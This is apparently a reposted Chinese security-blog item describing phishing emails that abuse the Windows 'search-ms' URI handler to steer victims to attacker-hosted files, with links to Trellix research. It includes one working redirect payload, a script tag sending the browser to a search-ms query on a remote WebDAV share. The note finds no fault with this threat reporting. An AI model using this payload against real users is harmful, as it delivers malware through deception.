CTF导航 CTF导航

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

渗透技巧 9个月前 admin
218 0 0



邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

APT Group 也使用这些技术。

<script>window.location.href = 'search-ms:query=Review&crumb=location: \\domain@SSLDavwwwRoot&displayname=Search;</script>

钓鱼邮件示例

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

感染链

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

攻击者服务器上的一些恶意文件和工具储存库

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

  • https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html



Microsoft Office 2019 / Windows 10 / search-ms:URI 处理程序利用和系统利用后步骤。

  • https://twitter.com/hackerfantastic/status/1531793396423176193




感谢您抽出

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

.

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

.

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

来阅读本文

邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

点它,分享点赞在看都在这里


原文始发于微信公众号(Ots安全):邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

版权声明:admin 发表于 2023年7月28日 上午10:05。
转载请注明:邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载 | CTF导航

相关文章

S&P 2022 论文录用列表
admin
1,464
CVE-2022-25167 Apache Flume JNDI 注入漏洞分析与复现
admin
1,417
每日安全动态推送(09-05)
admin
568
Bug Bounty Tip | 一次登陆绕过
admin
357
Docker 枚举、特权升级和容器逃逸 (DEEPCE)
admin
352
Log4shell中被忽视的威胁:BurpSuite插件
admin
1,097

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

CVE-2024-4040
0
見落としがちなURL正規化によるパストラバーサル
0
CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox
0
kkFileView文件上传导致远程代码执行漏洞
0
Ghidra RCE 漏洞分析
0
每日安全动态推送(4-29)
0
Jumpserver 数据恢复之所有服务器权限
0
每日安全动态推送(4-28)
0
[代码审计] 某盗U/发卡系统 不知道是几day
0
Cookie-Monster – BOF To Steal Browser Cookies & Credentials
0